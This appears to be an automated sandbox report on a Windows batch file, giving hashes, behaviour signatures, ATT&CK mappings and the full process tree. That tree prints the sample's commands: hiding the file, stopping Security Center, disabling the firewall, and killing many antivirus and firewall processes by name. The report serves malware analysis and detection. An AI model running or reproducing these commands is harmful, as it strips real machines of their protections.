d3adb1521dea6e9221677abcb9d6fa0e61761791547272643bee28f0ac58f77a

Analysis

max time kernel
134s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
12/10/2023, 10:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

yeay.bat
Size

3KB
MD5

c52ea73e0ff610403ce0b53173a55ad7
SHA1

59080dfb6964f2cb71cb3d8ce247b6e714310094
SHA256

d3adb1521dea6e9221677abcb9d6fa0e61761791547272643bee28f0ac58f77a
SHA512

f0d33fef150eded146186d1e939527eb8f5a7ecf208edf1eddc63b9ffffa2fe62278f6f890c406754951427090c35e0ca21620638093ee4ac18fb45779a6a25c

Score

8^/10

evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
1652	netsh.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5016	tskill.exe
5016	tskill.exe
1860	tskill.exe
1860	tskill.exe
568	tskill.exe
568	tskill.exe
3300	tskill.exe
3300	tskill.exe
3668	tskill.exe
3668	tskill.exe
2588	tskill.exe
2588	tskill.exe
3592	tskill.exe
3592	tskill.exe
4456	tskill.exe
4456	tskill.exe
2504	tskill.exe
2504	tskill.exe
2264	tskill.exe
2264	tskill.exe
3688	tskill.exe
3688	tskill.exe
3096	tskill.exe
3096	tskill.exe
3780	tskill.exe
3780	tskill.exe
3928	tskill.exe
3928	tskill.exe
1732	tskill.exe
1732	tskill.exe
3596	tskill.exe
3596	tskill.exe
3860	tskill.exe
3860	tskill.exe
2796	tskill.exe
2796	tskill.exe
1668	tskill.exe
1668	tskill.exe
2168	tskill.exe
2168	tskill.exe
2532	tskill.exe
2532	tskill.exe
3964	tskill.exe
3964	tskill.exe
2792	tskill.exe
2792	tskill.exe
5084	tskill.exe
5084	tskill.exe
2480	tskill.exe
2480	tskill.exe
4276	tskill.exe
4276	tskill.exe
1980	tskill.exe
1980	tskill.exe
4516	tskill.exe
4516	tskill.exe
2116	tskill.exe
2116	tskill.exe
4708	tskill.exe
4708	tskill.exe
4580	tskill.exe
4580	tskill.exe
792	tskill.exe
792	tskill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3772 wrote to memory of 2496	3772	cmd.exe	81
PID 3772 wrote to memory of 2496	3772	cmd.exe	81
PID 3772 wrote to memory of 788	3772	cmd.exe	82
PID 3772 wrote to memory of 788	3772	cmd.exe	82
PID 788 wrote to memory of 2036	788	net.exe	83
PID 788 wrote to memory of 2036	788	net.exe	83
PID 3772 wrote to memory of 1652	3772	cmd.exe	84
PID 3772 wrote to memory of 1652	3772	cmd.exe	84
PID 3772 wrote to memory of 5016	3772	cmd.exe	86
PID 3772 wrote to memory of 5016	3772	cmd.exe	86
PID 3772 wrote to memory of 1860	3772	cmd.exe	87
PID 3772 wrote to memory of 1860	3772	cmd.exe	87
PID 3772 wrote to memory of 568	3772	cmd.exe	88
PID 3772 wrote to memory of 568	3772	cmd.exe	88
PID 3772 wrote to memory of 3300	3772	cmd.exe	89
PID 3772 wrote to memory of 3300	3772	cmd.exe	89
PID 3772 wrote to memory of 3668	3772	cmd.exe	90
PID 3772 wrote to memory of 3668	3772	cmd.exe	90
PID 3772 wrote to memory of 2588	3772	cmd.exe	91
PID 3772 wrote to memory of 2588	3772	cmd.exe	91
PID 3772 wrote to memory of 3592	3772	cmd.exe	92
PID 3772 wrote to memory of 3592	3772	cmd.exe	92
PID 3772 wrote to memory of 4456	3772	cmd.exe	93
PID 3772 wrote to memory of 4456	3772	cmd.exe	93
PID 3772 wrote to memory of 2504	3772	cmd.exe	94
PID 3772 wrote to memory of 2504	3772	cmd.exe	94
PID 3772 wrote to memory of 2264	3772	cmd.exe	95
PID 3772 wrote to memory of 2264	3772	cmd.exe	95
PID 3772 wrote to memory of 3688	3772	cmd.exe	96
PID 3772 wrote to memory of 3688	3772	cmd.exe	96
PID 3772 wrote to memory of 3096	3772	cmd.exe	97
PID 3772 wrote to memory of 3096	3772	cmd.exe	97
PID 3772 wrote to memory of 3780	3772	cmd.exe	98
PID 3772 wrote to memory of 3780	3772	cmd.exe	98
PID 3772 wrote to memory of 3928	3772	cmd.exe	99
PID 3772 wrote to memory of 3928	3772	cmd.exe	99
PID 3772 wrote to memory of 1732	3772	cmd.exe	100
PID 3772 wrote to memory of 1732	3772	cmd.exe	100
PID 3772 wrote to memory of 3596	3772	cmd.exe	101
PID 3772 wrote to memory of 3596	3772	cmd.exe	101
PID 3772 wrote to memory of 3860	3772	cmd.exe	102
PID 3772 wrote to memory of 3860	3772	cmd.exe	102
PID 3772 wrote to memory of 2796	3772	cmd.exe	103
PID 3772 wrote to memory of 2796	3772	cmd.exe	103
PID 3772 wrote to memory of 1668	3772	cmd.exe	104
PID 3772 wrote to memory of 1668	3772	cmd.exe	104
PID 3772 wrote to memory of 2168	3772	cmd.exe	105
PID 3772 wrote to memory of 2168	3772	cmd.exe	105
PID 3772 wrote to memory of 2532	3772	cmd.exe	106
PID 3772 wrote to memory of 2532	3772	cmd.exe	106
PID 3772 wrote to memory of 3964	3772	cmd.exe	107
PID 3772 wrote to memory of 3964	3772	cmd.exe	107
PID 3772 wrote to memory of 2792	3772	cmd.exe	108
PID 3772 wrote to memory of 2792	3772	cmd.exe	108
PID 3772 wrote to memory of 5084	3772	cmd.exe	109
PID 3772 wrote to memory of 5084	3772	cmd.exe	109
PID 3772 wrote to memory of 2480	3772	cmd.exe	110
PID 3772 wrote to memory of 2480	3772	cmd.exe	110
PID 3772 wrote to memory of 4276	3772	cmd.exe	111
PID 3772 wrote to memory of 4276	3772	cmd.exe	111
PID 3772 wrote to memory of 1980	3772	cmd.exe	112
PID 3772 wrote to memory of 1980	3772	cmd.exe	112
PID 3772 wrote to memory of 4516	3772	cmd.exe	113
PID 3772 wrote to memory of 4516	3772	cmd.exe	113

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2496	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\yeay.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3772
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\AppData\Local\Temp\yeay.bat
  2⤵
  - Views/modifies file attributes
  PID:2496
- C:\Windows\system32\net.exe
  net stop ΓÇ£Security CenterΓÇ¥
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:788
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ΓÇ£Security CenterΓÇ¥
    3⤵
    PID:2036
- C:\Windows\system32\netsh.exe
  netsh firewall set opmode mode=disable
  2⤵
  - Modifies Windows Firewall
  PID:1652
- C:\Windows\system32\tskill.exe
  tskill /A av*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5016
- C:\Windows\system32\tskill.exe
  tskill /A fire*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1860
- C:\Windows\system32\tskill.exe
  tskill /A anti*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:568
- C:\Windows\system32\tskill.exe
  tskill /A spy*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3300
- C:\Windows\system32\tskill.exe
  tskill /A bullguard
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3668
- C:\Windows\system32\tskill.exe
  tskill /A PersFw
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2588
- C:\Windows\system32\tskill.exe
  tskill /A KAV*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3592
- C:\Windows\system32\tskill.exe
  tskill /A ZONEALARM
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4456
- C:\Windows\system32\tskill.exe
  tskill /A SAFEWEB
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2504
- C:\Windows\system32\tskill.exe
  tskill /A spy*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2264
- C:\Windows\system32\tskill.exe
  tskill /A bullguard
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3688
- C:\Windows\system32\tskill.exe
  tskill /A PersFw
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3096
- C:\Windows\system32\tskill.exe
  tskill /A KAV*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3780
- C:\Windows\system32\tskill.exe
  tskill /A ZONEALARM
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3928
- C:\Windows\system32\tskill.exe
  tskill /A SAFEWEB
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1732
- C:\Windows\system32\tskill.exe
  tskill /A OUTPOST
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3596
- C:\Windows\system32\tskill.exe
  tskill /A nv*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3860
- C:\Windows\system32\tskill.exe
  tskill /A nav*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2796
- C:\Windows\system32\tskill.exe
  tskill /A F-*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1668
- C:\Windows\system32\tskill.exe
  tskill /A ESAFE
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2168
- C:\Windows\system32\tskill.exe
  tskill /A cle
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2532
- C:\Windows\system32\tskill.exe
  tskill /A BLACKICE
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3964
- C:\Windows\system32\tskill.exe
  tskill /A def*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2792
- C:\Windows\system32\tskill.exe
  tskill /A kav
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5084
- C:\Windows\system32\tskill.exe
  tskill /A kav*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2480
- C:\Windows\system32\tskill.exe
  tskill /A avg*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4276
- C:\Windows\system32\tskill.exe
  tskill /A ash*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1980
- C:\Windows\system32\tskill.exe
  tskill /A aswupdsv
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4516
- C:\Windows\system32\tskill.exe
  tskill /A ewid*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2116
- C:\Windows\system32\tskill.exe
  tskill /A guard*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4708
- C:\Windows\system32\tskill.exe
  tskill /A guar*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4580
- C:\Windows\system32\tskill.exe
  tskill /A gcasDt*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:792
- C:\Windows\system32\tskill.exe
  tskill /A msmp*
  2⤵
  PID:572
- C:\Windows\system32\tskill.exe
  tskill /A mcafe*
  2⤵
  PID:2188
- C:\Windows\system32\tskill.exe
  tskill /A mghtml
  2⤵
  PID:1724
- C:\Windows\system32\tskill.exe
  tskill /A msiexec
  2⤵
  PID:436
- C:\Windows\system32\tskill.exe
  tskill /A outpost
  2⤵
  PID:4912
- C:\Windows\system32\tskill.exe
  tskill /A isafe
  2⤵
  PID:1016
- C:\Windows\system32\tskill.exe
  tskill /A zapcls
  2⤵
  PID:4436
- C:\Windows\system32\tskill.exe
  tskill /A zauinst
  2⤵
  PID:2080
- C:\Windows\system32\tskill.exe
  tskill /A upd
  2⤵
  PID:4408
- C:\Windows\system32\tskill.exe
  tskill /A zlclien*
  2⤵
  PID:852
- C:\Windows\system32\tskill.exe
  tskill /A minilog
  2⤵
  PID:3872
- C:\Windows\system32\tskill.exe
  tskill /A cc*
  2⤵
  PID:2688
- C:\Windows\system32\tskill.exe
  tskill /A norton*
  2⤵
  PID:4156
- C:\Windows\system32\tskill.exe
  tskill /A norton au*
  2⤵
  PID:5000
- C:\Windows\system32\tskill.exe
  tskill /A ccc*
  2⤵
  PID:224
- C:\Windows\system32\tskill.exe
  tskill /A npfmn*
  2⤵
  PID:2636
- C:\Windows\system32\tskill.exe
  tskill /A loge*
  2⤵
  PID:2120
- C:\Windows\system32\tskill.exe
  tskill /A nisum*
  2⤵
  PID:3932
- C:\Windows\system32\tskill.exe
  tskill /A issvc
  2⤵
  PID:1460
- C:\Windows\system32\tskill.exe
  tskill /A tmp*
  2⤵
  PID:1280
- C:\Windows\system32\tskill.exe
  tskill /A tmn*
  2⤵
  PID:2356
- C:\Windows\system32\tskill.exe
  tskill /A pcc*
  2⤵
  PID:1260
- C:\Windows\system32\tskill.exe
  tskill /A cpd*
  2⤵
  PID:2780
- C:\Windows\system32\tskill.exe
  tskill /A pop*
  2⤵
  PID:1504
- C:\Windows\system32\tskill.exe
  tskill /A pav*
  2⤵
  PID:4656
- C:\Windows\system32\tskill.exe
  tskill /A padmincls
  2⤵
  PID:4692
- C:\Windows\system32\tskill.exe
  tskill /A panda*
  2⤵
  PID:4332
- C:\Windows\system32\tskill.exe
  tskill /A avsch*
  2⤵
  PID:4168
- C:\Windows\system32\tskill.exe
  tskill /A sche*
  2⤵
  PID:3888
- C:\Windows\system32\tskill.exe
  tskill /A syman*
  2⤵
  PID:1512
- C:\Windows\system32\tskill.exe
  tskill /A virus*
  2⤵
  PID:728
- C:\Windows\system32\tskill.exe
  tskill /A realmcls
  2⤵
  PID:4124
- C:\Windows\system32\tskill.exe
  tskill /A sweep
  2⤵
  PID:1148
- C:\Windows\system32\tskill.exe
  tskill /A scan*
  2⤵
  PID:844
- C:\Windows\system32\tskill.exe
  tskill /A ad-*
  2⤵
  PID:656
- C:\Windows\system32\tskill.exe
  tskill /A safe*
  2⤵
  PID:4528
- C:\Windows\system32\tskill.exe
  tskill /A avas*
  2⤵
  PID:1840
- C:\Windows\system32\tskill.exe
  tskill /A norm*
  2⤵
  PID:4204
- C:\Windows\system32\tskill.exe
  tskill /A offg*
  2⤵
  PID:1424

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads